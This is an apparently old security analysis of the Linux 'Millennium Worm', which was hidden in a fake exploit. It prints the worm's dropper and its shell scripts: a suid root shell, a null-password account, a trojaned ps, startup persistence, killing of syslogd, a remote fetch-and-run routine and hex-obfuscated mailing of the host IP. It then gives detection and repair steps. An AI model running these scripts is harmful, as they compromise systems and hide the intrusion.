• Summary 
• Origin 
• Lifecycle-localhost 
• Lifecycle-network 
• Detection 
• Prevention 
• Repair 

The Millennium Internet Worm is a collection of scripts and programs whose function is to exploit common remote vulnerabilities in linux systems in order to gain access and propagate itself throughout the net. The Millennium Worm discovered currently uses Linux specific x86 remote exploits for the imap4 v10.X, Qualcomm popper, bind with iquery, and rpc.mountd services. This worm does one thing that we can appreciate, which is to fix the security holes. It has been reported to have infected at least one person in the wild.

ORIGIN

Our first contact with the "Millenium Worm" was as a hidden payload in an trojan that claimed to be the ADMmountd2 remote exploit for the linux rpc.mountd service. ADM has publicly denied having created or released the trojan, and have included the trojan in their archive of fake releases [located at ftp://adm.freelsd.net/ADM/FAKES/ maintained by ndubee@df.ru].

The trojan is composed of a slightly modified ADMmountd exploit, with wording changed to make it appear new, and the hidden worm payload within the source code of the module ADMgetip.c. ADM has restricted access to the trojan code in their archive, so it is presented here, for the purpose of analysis and educational use. You can use this code to follow along with the present writeup. ADMgetip-TROJAN-VERSION.c. The version found in the wild had the datestamp Aug 15 1999.

LIFECYCLE: Initial Trojan

The mworm.tgz archive that contains the Millenium Worm is first created by the trojaned routine from the exploit. The trojan exploit code first writes it's payload to the file /var/tmp/tmp, extracts the contents, and then executes a startup script called wormup. The payload is a uuencoded archive called mworm.tgz, and is extracted by the following code:
 

FILE *fp=fopen("/var/tmp/tmp","w");
if(getuid()!=0) { fprintf(stderr,"operation not permitted\n"); exit(0); }
fprintf(fp,"begin-base64 644 mworm.tgz
H4sIANpU/TYAA+xaD3CUx3XfOx1wHALEHxts4/hDRrYE0vHdSQJkgQsIYWhk
UCSQHSM4n+6+4ztxujvfHypiuwEr1DqEYsWeTp1MUhOctEnr6biMnSbFY8vA
YNyBlGB3ShonZVy3ORmSIZgabMtcf293v7vvOwk7k4k7k5l8o3f7vd23b9++

...  [ large uuencoded mworm.tgz here ]

emgL0uE1iuMHR6u1MaA8jUhjOHm2+OzzGLqoNLv0SRpBuNS6XmDYdwe6Z55f
bYCEt3q80+XpdMU1NM8J2FDCra2crXTRduAMD0Johcwe8ODFVzDnnwNKJcF8
ivJ+7s3IgAEDBgwYMGDAgAEDBgwYMGDAgAEDPxS+AlHjZQIA+AIA
====\n");
system("( cd /var/tmp;uudecode < tmp ; sleep 1; tar xzvf mworm.tgz;\
 ./wormup ) >/dev/null 2>/dev/null &");

Note that it does not extract if the user isn't uid 0. The extracted mworm.tgz creates the following files: 
 

Directory of /var/tmp

-rw-r--r--   1 root     root        51564 Aug 17 22:21 mworm.tgz -rwxr-xr-x   1 root     root         8647 Dec 31  1999 Hnamed* -rwxr-xr-x   1 root     root         5173 Dec 31  1999 Hnamed.c* -rwxr-xr-x   1 root     root          477 Dec 31  1999 IP* -rwxr-xr-x   1 root     root         1728 Dec 31  1999 README-ADMINS* -rwxr-xr-x   1 root     root         5749 Dec 31  1999 bd* -rwxr-xr-x   1 root     root         1340 Dec 31  1999 bd.c* -rwxr-xr-x   1 root     root            0 Dec 31  1999 cmd* -rwxr-xr-x   1 root     root         5292 Dec 31  1999 ftpscan* -rwxr-xr-x   1 root     root          911 Dec 31  1999 ftpscan.c* -rwxr-xr-x   1 root     root         8750 Dec 31  1999 ftpx* -rwxr-xr-x   1 root     root         5108 Dec 31  1999 ftpx.c* -rwxr-xr-x   1 root     root         2398 Dec 31  1999 getip.c* -rwxr-xr-x   1 root     root         6436 Dec 31  1999 im* -rwxr-xr-x   1 root     root         2634 Dec 31  1999 im.c* -rwxr-xr-x   1 root     root          151 Dec 31  1999 infect* -rwxr-xr-x   1 root     root            1 Dec 31  1999 infected* -rwxr-xr-x   1 root     root         2755 Dec 31  1999 ip_icmp.h* -rwxr-xr-x   1 root     root         6175 Dec 31  1999 mount.h* -rwxr-xr-x   1 root     root         5152 Dec 31  1999 mount.x* -rwxr-xr-x   1 root     root         2222 Dec 31  1999 mount_clnt.c* -rwxr-xr-x   1 root     root         3178 Dec 31  1999 mount_svc.c* -rwxr-xr-x   1 root     root         2366 Dec 31  1999 mount_xdr.c* -rwxr-xr-x   1 root     root        13048 Dec 31  1999 mountd* -rwxr-xr-x   1 root     root         7723 Dec 31  1999 mountd.c* -rwxr-xr-x   1 root     root          668 Dec 31  1999 mwd* -rwxr-xr-x   1 root     root          561 Dec 31  1999 mwd-ftp* -rwxr-xr-x   1 root     root          448 Dec 31  1999 mwd-imap* -rwxr-xr-x   1 root     root          355 Dec 31  1999 mwd-mountd* -rwxr-xr-x   1 root     root          529 Dec 31  1999 mwd-pop* -rwxr-xr-x   1 root     root          755 Dec 31  1999 mwi* -rwxr-xr-x   1 root     root          844 Dec 31  1999 mworm* -rwxr-xr-x   1 root     root         4617 Dec 31  1999 mwr* -rwxr-xr-x   1 root     root          407 Dec 31  1999 mwr.c* -rwxr-xr-x   1 root     root         5849 Dec 31  1999 mws* -rwxr-xr-x   1 root     root         1522 Dec 31  1999 mws.c* -rwxr-xr-x   1 root     root         1439 Dec 31  1999 pgp* -rwxr-xr-x   1 root     root         1226 Dec 31  1999 prepare* -rwxr-xr-x   1 root     root         5430 Dec 31  1999 q* -rwxr-xr-x   1 root     root         1350 Dec 31  1999 q.c* -rwxr-xr-x   1 root     root         6785 Dec 31  1999 qp* -rwxr-xr-x   1 root     root         2886 Dec 31  1999 qp.c* -rwxr-xr-x   1 root     root         5680 Dec 31  1999 remotecmd* -rwxr-xr-x   1 root     root         1834 Dec 31  1999 remotecmd.c* -rwxr-xr-x   1 root     root         7286 Dec 31  1999 test* -rwxr-xr-x   1 root     root         4355 Dec 31  1999 test.c* -rwxr-xr-x   1 root     root         1037 Dec 31  1999 wormup*

The first thing after the archive is extracted to /var/tmp is the execution of the "wormup" script. The contents are shown below:
 

wormup

#!/bin/sh # MILLENNIUM WORM SETUP SCRIPT # ./wormup -dist = create a new build # ./wormup & = install the worm (root) if [ x$1 = "x-dist" ] then echo "Creating Millennium Worm distribution." indent *.c rm -f *~ echo -n "Compiling: " for C in Hnamed q bd im qp ftpscan mwr remotecmd ftpx mws test do rm -f $C gcc -Wall -O2 ${C}.c -o $C echo -n $C" " done rm -f mountd rpcgen -C mount.x && gcc -Wall -O2 mountd.c -o mountd \ >/dev/null 2>/dev/null echo "mountd ..done" echo -n "Fixing misc. file stuff... " printf "" > cmd printf "0" > infected chmod 755 * touch -t 010100002000.00 * echo "done." rm -f mworm.tgz tar czf mworm.tgz * echo "Finished. mworm.tgz recreated." exit 0 fi if [ $UID != 0 ] ; then echo You need root to screw up this machine, sorry. exit 0 fi cp /bin/sh /bin/.mwsh && chmod 4755 /bin/.mwsh mkdir /tmp/.... && cp mworm.tgz /tmp/.... echo mw::2222:555:millennium worm:/:/bin/sh >>/etc/passwd cd /tmp/.... && tar xzvf mworm.tgz ./mworm >/dev/null 2>/dev/null & echo "Millennium Worm(tm). Phear thy unix like thyself."

There is a "distribution" routine (highlighted in blue) that is not run by default. It performs the following functions:

• removes and recompiles all of the binaries that come in the worm.tgz 
• prepares the network infection routines 
• wipe cmd file clean, for later use 
• wipe infected file with value "0", for use as a counter 
• set all files to mode 755 
• set all file timestamps to January 1st 2000, 00:00:00 
• rebuilds a mworm.tgz archive of the current directory /var/tmp 

When initiated as a trojan in the fake exploit, the Millennium worm will first run the "wormup" script and accomlish the following:

• creates user account "mw" with null password 
• creates suid root shell as /tmp/.mwsh 
• launch the worm 

• worm adds itself to startup scripts /etc/rc.d/rc.local and /etc/profile 
• emails the system IP address to trax31337@hotmail.com 
• propagates the worm by scanning for and attacking other random systems 

Whoever runs the trojan exploit as root will become infected by the worm and will also cause it to become active and start trying to spread. Note that the startup script has a "-dist" option that is not immediately used. The startup script performs the following functions:

• creates a suid root shell at /tmp/.mwsh 
• appends new entry in /etc/passwd for "mw" uid 2222 with null password 
• extracts the mworm.tgz archive into /tmp/... 
• executes "mworm" 

#!/bin/.mwsh
# Millennium Worm by Anonymous
# If you found this on your machine, but didn't download it
# well.. you have a problem :)
export PATH="/bin/:/usr/sbin/:/usr/bin:/sbin:/usr/local/bin:."
export IP_A=`./IP`

./prepare for your d00m mortalz

cat << _EOF_ > cmd
mw
mw
mw
mw
mw
/bin/.mwsh -c "/usr/sbin/named" &
export PATH="/bin/:/usr/sbin/:/usr/bin:/sbin:/usr/local/bin:."
mkdir /tmp/....
cd /tmp/....
if [ -f /tmp/.X12 ]
then
logout
fi
ftp $IP_A
mw


cd /tmp/....
get mworm.tgz
bye
tar xvzf mworm.tgz
touch /tmp/.X12
nohup ./mworm &
./IP | mail `printf "\x74\x72\x61\x78\x33\x31\x33\x33\x37\x40\
\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
logout
_EOF_

./mwd &
./mwd-pop &
./mwd-imap &
./mwd-mountd &
./mwd-ftp &
sleep 60
nohup ./mwd &
nohup ./mwd-pop &
nohup ./mwd-imap &
nohup ./mwd-mountd &
nohup ./mwd-ftp &

/bin/.mwsh -c ./bd

This script seems to be the heart of the worm. It performs the following actions:

• runs prepare script (see below)
• creates a cmd script that will be executed on a target host
• sends and email containing the IP address to trax31337@hotmail.com
• launches daemons mwd, mwd-pop, mwd-imap, mwd-mountd, and mwd-ftp 
• runs "bd", which is a backdoor that binds to tcp port 1338 and allows remote root access after receiving the keyword "millennium". 

#!/bin/.mwsh
# Millennium Worm Preparation File
# This sets up the stuff to make sure your
# machine will be owned in a neat and proper way ;D

export PATH="/bin/:/usr/sbin/:/usr/bin:/sbin:/usr/local/bin:."

if [ -f /bin/.ps ]
then
printf ""
else
./README-ADMINS >/dev/null 2>/dev/null &
mv /bin/ps /bin/.ps;echo "/bin/.ps \$* | grep -v ps | grep -v mw | \
grep -v grep" >> /bin/ps ; chmod 755 /bin/ps
if [ -f /etc/rc.d/rc.local ]
then
echo "( sleep 10 ; cd /tmp/..../ ; ./mworm ) >>/dev/null & " \
>> /etc/rc.d/rc.local
else
echo "( sleep 10 ; cd /tmp/..../ ; ./mworm ) >>/dev/null & " \
>> /etc/profile
fi
chattr +ia /tmp/..../*.c /tmp/..../mwd* /tmp/..../prepare /bin/.mwsh
chattr +ia /etc/rc.d/rc.local /etc/profile /tmp/..../mwo* /tmp/..../IP
chattr -ia /tmp/..../mount_*.c
fi

killall -q -9 syslogd

gcc -Wall -O2 Hnamed.c -o Hnamed
gcc -Wall -O2 mwr.c -o mwr
gcc -Wall -O2 q.c -o q
gcc -Wall -O2 remotecmd.c -o remotecmd
gcc -Wall -O2 test.c -o test
gcc -Wall -O2 bd.c -o bd
gcc -Wall -O2 im.c -o im
gcc -Wall -O2 qp.c -o qp
gcc -Wall -O2 mws.c -o mws
gcc -Wall -O2 ftpscan.c -o ftpscan
gcc -Wall -O2 ftpx.c -o ftpx
rpc=`which rpcgen`
which rpcgen && $rpc -C mount.x && gcc -Wall -O2 mountd.c -o mountd

/bin/.mwsh -c ./bd &

The prepare script shown above performs the following functions:

• runs "README-ADMINS" which secures the local system against the attacks the worm uses 
• trojans /bin/ps so the worms activities will not show up with the "ps" command 
• adds itself to the system startup scripts so it will run after reboots 
• make files used by the worm append-only and immutable (can be fixed by root with chattr) 
• disables logging by killing syslogd 
• once again runs "bd", which is a backdoor that binds to tcp port 1338 and allows remote root access after receiving the keyword "millennium". 

Host based:

• /etc/passwd contains new user account "mw" with null password 
• /tmp/.mwsh exists and is a suid root shell 
• /tmp/.... directory created containing worm files 
• /etc/rc.d/rc.local startup file has mworm entry at the end 
• /etc/profile startup file has mworm entry at end 
• syslogd had stopped unexpectedly 
• mountd is disabled 
• dns service is firewalled and disabled 
• qpop and imap have been upgraded without your knowledge 
• /etc/hosts.deny and /etc/hosts.allow are set to null length/empty 
• processes running such as .mwsh, mworm, Hnamed, remotecmd, mwd, mwd-ftp, mwd-imap, mwd-pop, mwd-mountd, ps ("bd" backdoor disguised as ps), 

• outgoing email to trax31337@hotmail.com (if you rely on syslogd and it was killed by this worm, then possibly check alternate logging such as a proxy firewall if you use one) 
• incoming ftpd connections as user mw or the file mworm.tgz being retrieved (local system logs may not show this as syslogd is stopped by the worm, or alternate logging was in place such as a proxy firewall) 
• incoming traffic to backdoor tcp port 1338 
• outgoing traffic to tcp port 53 (worm exploiting BIND IQUERY vulnerability using "Hnamed") 
• outgoing traffic to tcp port 110 (worm exploiting Qpopper Overflow vulnerability using "qp") 
• outgoing traffic to tcp port 143 (worm exploiting Imapd Overflow vulnerability using "im") 
• outgoing traffic to tcp port 635 (worm exploiting rpc.mountd vulnerability using "mountd") 
• outgoing telnet to tcp port 23 as user w0rm (the worm spreading by using "remotecmd") 

UPGRADE. The Millennium Worm spreads by remotely exploiting vulnerabilities in earlier versions of certain system software. If you upgrade your software to a newer release that is not vulnerable to these particular holes, then you will be effectively immune to this worm. Please note, however, that it is a trivial matter for attackers to create variations of this worm, using other vulnerabilities including ones affecting other platforms than linux. It is always best practice to keep your system and network software current, and watch public security forums for new information that could affect your operating environment.

For Redhat users, refer to http://www.redhat.com/errata/

Repair

To repair an existing infection from the Millennium Worm, you would need to take the following steps:

• delete the suid root shell [/bin/rm -rf /tmp/.mwsh] 
• stop any running worm processes [/usr/bin/killall -9 mworm] 
• remove the protection flags on the mworm files [/usr/bin/chattr -R -ia /tmp/....] 
• remove the worm files [/bin/rm -rf /tmp/....] 
• replace /bin/ps with the original /bin/.ps [/bin/cp /bin/.ps /bin/ps] 
• remove the mw user from the passwd file [/usr/sbin/userdel -r mw] 
• remove worm references from startup scripts /etc/rc.d/rc.local and /etc/profile 
• kill the "bd" backdoor process. If you have removed the worm then this is as easy as rebooting, since it will not be restarted on the next system boot.